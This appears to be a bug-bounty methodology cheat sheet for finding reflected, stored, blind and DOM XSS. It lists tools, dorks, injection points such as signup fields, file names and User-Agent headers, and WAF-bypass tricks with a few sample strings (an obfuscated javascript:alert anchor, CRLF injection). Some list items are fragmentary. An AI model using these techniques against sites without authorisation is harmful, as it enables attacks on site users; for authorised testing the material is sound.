Many methods out in wild but here are few most common , but not limited.
One Awesome mind map for approach to reflected xss can be found here https://github.com/A9HORA/Reflected-XSS-Mindmap Made By @A9HORA
Tip: While using other methods put method 2 in background in terminal or on vps
- 1.Download Reflection and sentinal plugin for burp.
- 2.Walk and spider the target site.
- 3.Check the reflected params tab in burp
- 4.send that sentinal or check manually.
- 2.Filter the parameters using
grep "="or gf patterns and store it in a new file.
- 1.Using Google Dork
site:target.comfilter the result
- 2.Now search for links which have params by adding more dorks something like
site:target.com filetype:phpetc you can find some dorks at this link https://www.openbugbounty.org/blog/devl00p/top-100-xss-dorks/ or google it out.
- 3.Check if the param value is getting reflected in html source code
- 4.Try Xss payload there or pass it to some tool
- 2.You can Manually Check Right Click View Page Source and search for
- 3.Now Append that to webpage urls. For example
- 1.Use Methods 1 or 2 to Gather the urls
- 3.Find WAF bypass payload on twitter by searching or in this Github Repo https://github.com/0xInfection/Awesome-WAF
- Check the error pages (404,403,..) sometimes they contain reflected values
- Trigger a 403 by trying to get the .htaccess file
- Try every reflected parameter
Stored Xss are mostly found manually
- 1.Enumerate the Firewall using above Methods and select a payload to test accordingly.
- 2.Try that selected WAF bypass payload while registering on a site in fields like username, name, address, email, etc.
- 3.Try Payload in File name of profile picture and also in the source file of image.
- 4.Try in Comment section anywhere on target site.
- 5.Try on every input fields which get reflected in page and which can be seen by other users.
- 6.Try to signup using your name + xss payload and that can lead to stored xss. Tips
- For every input field
- Try to get
<a href=#>test</a>an entity in
- Try to get an obfuscated entity in
- If it catches on anything, go deeper
- https://www.youtube.com/watch?v=uHy1x1NkwRU Writeup: -https://medium.com/@fatin151485/how-i-found-my-first-stored-xss-on-popular-eboighar-com-6bd497b0bb96
Similar to Reflected Xss Or Stored Xss But you Dont get any reflection, but you get response on you server.
- 1.Similar methods As given above except try putting payload which can give a callback on your server when executed.
- 3.Try it on contact forms or similar functionality.
- Copy every payload from your xsshunter payloads section and paste it into every field you see
- XSS hunter contains a payload for CSP bypass
- Generate some variations of your payloads (example replace < with
1- Review forms
2- Contact Us pages
3- Passwords(You never know if the other side doesn’t properly handle input and if your password is in View mode)
4- Address fields of e-commerce sites
5- First or Last Name field while doing Credit Card Payments
6- Set User-Agent to a Blind XSS payload. You can do that easily from a proxy such as Burpsuite.
7- Log Viewers
8- Feedback Page
9- Chat Applications
10- Any app that requires user moderation
- Would not recommend manually looking for DOM XSS
- Burp suite PRO scanner can find DOM XSS
- Tool: https://github.com/dpnishant/ra2-dom-xss-scanner
- < and > can be replace with html entities
- You can try an XSS polyglot
- Check if the firewall is blocking only lowercase
- Try to break firewall regex with the new line(\r\n)
- Try Double Encoding
- Testing for recursive filters, if firewall removes text in red, we will have clear payload
- Injecting anchor tag without whitespaces
Ex:- <a/href="j	a	v	asc	ri	pt:alert(1)">
- Try to bypass whitespaces using Bullet
- Try to change request method
Ex:- GET /?q=xss POST/
- Try CRLF Inection
Ex:- GET /%0A%ODValue=%20Virus